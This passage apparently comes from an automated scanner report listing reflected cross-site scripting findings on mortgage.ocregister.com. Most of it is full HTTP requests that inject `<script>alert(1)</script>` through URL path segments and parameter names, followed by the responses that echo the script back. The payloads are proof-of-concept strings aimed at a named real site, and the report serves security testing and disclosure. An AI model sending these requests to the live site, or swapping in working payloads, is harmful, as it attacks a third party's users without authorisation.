Date: Thu, 03 Feb 2011 19:15:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05e5186\"><script>alert(1)</script>5f95e6db221/feed/" /> ...[SNIP]...
1.221. http://mortgage.ocregister.com/2007/05/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb37e"><script>alert(1)</script>c34013ed727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cb37e\"><script>alert(1)</script>c34013ed727 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/05/?cb37e"><script>alert(1)</script>c34013ed727=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05/?cb37e\"><script>alert(1)</script>c34013ed727=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d840"><script>alert(1)</script>d1f9139be71 was submitted in the REST URL parameter 1. This input was echoed as 4d840\"><script>alert(1)</script>d1f9139be71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20074d840"><script>alert(1)</script>d1f9139be71/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20074d840\"><script>alert(1)</script>d1f9139be71/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a890"><script>alert(1)</script>7c589308949 was submitted in the REST URL parameter 2. This input was echoed as 2a890\"><script>alert(1)</script>7c589308949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/062a890"><script>alert(1)</script>7c589308949/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/062a890\"><script>alert(1)</script>7c589308949/feed/" /> ...[SNIP]...
1.224. http://mortgage.ocregister.com/2007/06/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 194ec"><script>alert(1)</script>237ccbfc119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 194ec\"><script>alert(1)</script>237ccbfc119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/06/?194ec"><script>alert(1)</script>237ccbfc119=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/06/?194ec\"><script>alert(1)</script>237ccbfc119=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23d"><script>alert(1)</script>6e84ace3326 was submitted in the REST URL parameter 1. This input was echoed as 8d23d\"><script>alert(1)</script>6e84ace3326 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20078d23d"><script>alert(1)</script>6e84ace3326/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078d23d\"><script>alert(1)</script>6e84ace3326/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d03c"><script>alert(1)</script>c44ede61d27 was submitted in the REST URL parameter 2. This input was echoed as 1d03c\"><script>alert(1)</script>c44ede61d27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/071d03c"><script>alert(1)</script>c44ede61d27/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/071d03c\"><script>alert(1)</script>c44ede61d27/feed/" /> ...[SNIP]...
1.227. http://mortgage.ocregister.com/2007/07/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62aca"><script>alert(1)</script>e6bbf50b3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62aca\"><script>alert(1)</script>e6bbf50b3b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/07/?62aca"><script>alert(1)</script>e6bbf50b3b1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/07/?62aca\"><script>alert(1)</script>e6bbf50b3b1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7bc"><script>alert(1)</script>5aaea72dd5b was submitted in the REST URL parameter 1. This input was echoed as ab7bc\"><script>alert(1)</script>5aaea72dd5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007ab7bc"><script>alert(1)</script>5aaea72dd5b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007ab7bc\"><script>alert(1)</script>5aaea72dd5b/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b467"><script>alert(1)</script>edf8b7e6341 was submitted in the REST URL parameter 2. This input was echoed as 3b467\"><script>alert(1)</script>edf8b7e6341 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/083b467"><script>alert(1)</script>edf8b7e6341/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/083b467\"><script>alert(1)</script>edf8b7e6341/feed/" /> ...[SNIP]...
1.230. http://mortgage.ocregister.com/2007/08/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7dfe"><script>alert(1)</script>03f410c0f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7dfe\"><script>alert(1)</script>03f410c0f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/08/?c7dfe"><script>alert(1)</script>03f410c0f9f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/08/?c7dfe\"><script>alert(1)</script>03f410c0f9f=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193b6"><script>alert(1)</script>602a3651353 was submitted in the REST URL parameter 1. This input was echoed as 193b6\"><script>alert(1)</script>602a3651353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007193b6"><script>alert(1)</script>602a3651353/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007193b6\"><script>alert(1)</script>602a3651353/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab9b"><script>alert(1)</script>7e39935c7da was submitted in the REST URL parameter 2. This input was echoed as eab9b\"><script>alert(1)</script>7e39935c7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/09eab9b"><script>alert(1)</script>7e39935c7da/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09eab9b\"><script>alert(1)</script>7e39935c7da/feed/" /> ...[SNIP]...
1.233. http://mortgage.ocregister.com/2007/09/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7116"><script>alert(1)</script>1999014b26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7116\"><script>alert(1)</script>1999014b26e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/09/?a7116"><script>alert(1)</script>1999014b26e=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09/?a7116\"><script>alert(1)</script>1999014b26e=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfb6"><script>alert(1)</script>2ffcd926e6b was submitted in the REST URL parameter 1. This input was echoed as 8bfb6\"><script>alert(1)</script>2ffcd926e6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20078bfb6"><script>alert(1)</script>2ffcd926e6b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078bfb6\"><script>alert(1)</script>2ffcd926e6b/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218bc"><script>alert(1)</script>3aaf6a800aa was submitted in the REST URL parameter 2. This input was echoed as 218bc\"><script>alert(1)</script>3aaf6a800aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/10218bc"><script>alert(1)</script>3aaf6a800aa/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
